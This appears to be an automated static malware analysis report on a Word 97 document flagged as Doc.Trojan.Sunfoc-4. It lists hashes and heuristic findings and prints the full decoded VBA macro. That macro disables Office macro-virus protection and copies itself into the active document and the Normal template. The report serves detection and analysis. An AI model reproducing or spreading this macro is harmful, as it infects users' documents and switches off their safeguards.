Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1cb3d04bdf5c86d…

MALICIOUS

Office (OLE)

Size: 29.0 KB
Created: 2000-01-23 02:53:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-15
MD5: 0c338771d40b357fad8ba7f00aeb36c0
SHA-1: 7bc386475d52ad326dfcea1980717916689ad0a8
SHA-256: a1cb3d04bdf5c86d0788cf23ff6b32d92cd63eb29102e41d26db2d4d7a9d24ea
Risk Score: 208

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro attempts to disable virus protection and replicate its code into other documents and templates, which is a common tactic for malware propagation and persistence. The ClamAV detection further confirms its malicious nature.

Heuristics (4)

  • ClamAV: Doc.Trojan.Sunfoc-4 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sunfoc-4
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    If B <> 1 Then D.DeleteLines 1, D.CountOfLines
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
    Private Sub Document_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 748 bytes
SHA-256: 1e020884142223772e7b01a350b7a6ee0fc6aa1892a1a1e9d891ac786c0231a5
Detection: ClamAV: Doc.Trojan.Sunfoc-4
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Set A = Options
A.VirusProtection = 0
A.SaveNormalPrompt = 0
A.ConfirmConversions = 0
For B = 1 To 3
If B = 1 Then Set C = ThisDocument
If B = 2 Then Set C = ActiveDocument
If B = 3 Then Set C = NormalTemplate
Set D = C.VBProject.VBComponents.Item(1).CodeModule
If B = 1 Then E = D.Lines(1, D.CountOfLines)
If B <> 1 Then D.DeleteLines 1, D.CountOfLines
If B <> 1 Then D.Addfromstring E
Next
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub